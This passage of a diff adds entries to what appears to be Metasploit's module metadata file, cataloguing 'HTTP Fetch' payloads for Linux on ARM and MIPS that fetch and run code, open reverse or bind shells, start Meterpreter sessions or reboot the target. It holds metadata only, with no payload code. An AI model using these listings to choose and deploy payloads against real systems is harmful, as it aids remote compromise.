+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Jonathan Salwan"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nExecute an arbitrary command",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armle/meterpreter/bind_tcp": {
+    "name": "HTTP Fetch, Bind TCP Stager",
+    "fullname": "payload/cmd/linux/http/armle/meterpreter/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "nemo <nemo@felinemenace.org>"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nListen for a connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/meterpreter/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/meterpreter/bind_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/meterpreter",
+    "stager_refname": "linux/armle/bind_tcp"
+  },
+  "payload_cmd/linux/http/armle/meterpreter/reverse_tcp": {
+    "name": "HTTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/armle/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "nemo <nemo@felinemenace.org>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/meterpreter",
+    "stager_refname": "linux/armle/reverse_tcp"
+  },
+  "payload_cmd/linux/http/armle/meterpreter_reverse_http": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armle/meterpreter_reverse_https": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armle/meterpreter_reverse_tcp": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armle/shell/bind_tcp": {
+    "name": "HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager",
+    "fullname": "payload/cmd/linux/http/armle/shell/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "nemo <nemo@felinemenace.org>"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/shell/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/shell/bind_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/shell",
+    "stager_refname": "linux/armle/bind_tcp"
+  },
+  "payload_cmd/linux/http/armle/shell/reverse_tcp": {
+    "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/armle/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "nemo <nemo@felinemenace.org>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/armle/shell",
+    "stager_refname": "linux/armle/reverse_tcp"
+  },
+  "payload_cmd/linux/http/armle/shell_bind_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/http/armle/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "civ",
+      "hal"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect to target and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/armle/shell_reverse_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/http/armle/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "civ"
+    ],
+    "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/armle/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/armle",
+    "adapted_refname": "linux/armle/shell_reverse_tcp",
+    "staged": false
+  },
  "payload_cmd/linux/http/mips64/meterpreter_reverse_http": {
    "name": "HTTP Fetch",
    "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_http",
@@ -198753,6 +200371,1136 @@
    "adapted_refname": "linux/mips64/meterpreter_reverse_tcp",
    "staged": false
  },
+  "payload_cmd/linux/http/mipsbe/exec": {
+    "name": "HTTP Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/http/mipsbe/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "entropy <entropy@phiral.net>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n                A very small shellcode for executing commands.\n                This module is sometimes helpful for testing purposes.",
+    "references": [
+      "EDB-17940"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsbe/meterpreter/reverse_tcp": {
+    "name": "HTTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsbe/meterpreter",
+    "stager_refname": "linux/mipsbe/reverse_tcp"
+  },
+  "payload_cmd/linux/http/mipsbe/meterpreter_reverse_http": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsbe/meterpreter_reverse_https": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsbe/meterpreter_reverse_tcp": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsbe/reboot": {
+    "name": "HTTP Fetch, Linux Reboot",
+    "fullname": "payload/cmd/linux/http/mipsbe/reboot",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "rigan - <imrigan@gmail.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n            A very small shellcode for rebooting the system.\n            This payload is sometimes helpful for testing purposes or executing\n            other payloads that rely on initial startup procedures.",
+    "references": [
+      "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/reboot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/reboot",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsbe/shell/reverse_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/mipsbe/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsbe/shell",
+    "stager_refname": "linux/mipsbe/reverse_tcp"
+  },
+  "payload_cmd/linux/http/mipsbe/shell_bind_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/http/mipsbe/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "scut",
+      "vaicebine",
+      "Vlatko Kosturjak",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsbe/shell_reverse_tcp": {
+    "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/http/mipsbe/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "rigan <imrigan@gmail.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+      "EDB-18226"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsbe/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsbe",
+    "adapted_refname": "linux/mipsbe/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsle/exec": {
+    "name": "HTTP Fetch, Linux Execute Command",
+    "fullname": "payload/cmd/linux/http/mipsle/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "entropy <entropy@phiral.net>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n        A very small shellcode for executing commands.\n        This module is sometimes helpful for testing purposes as well as\n        on targets with extremely limited buffer space.",
+    "references": [
+      "EDB-17940"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/exec",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsle/meterpreter/reverse_tcp": {
+    "name": "HTTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsle/meterpreter",
+    "stager_refname": "linux/mipsle/reverse_tcp"
+  },
+  "payload_cmd/linux/http/mipsle/meterpreter_reverse_http": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsle/meterpreter_reverse_https": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/http/mipsle/meterpreter_reverse_tcp": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb",
+    "is_install_path": true,
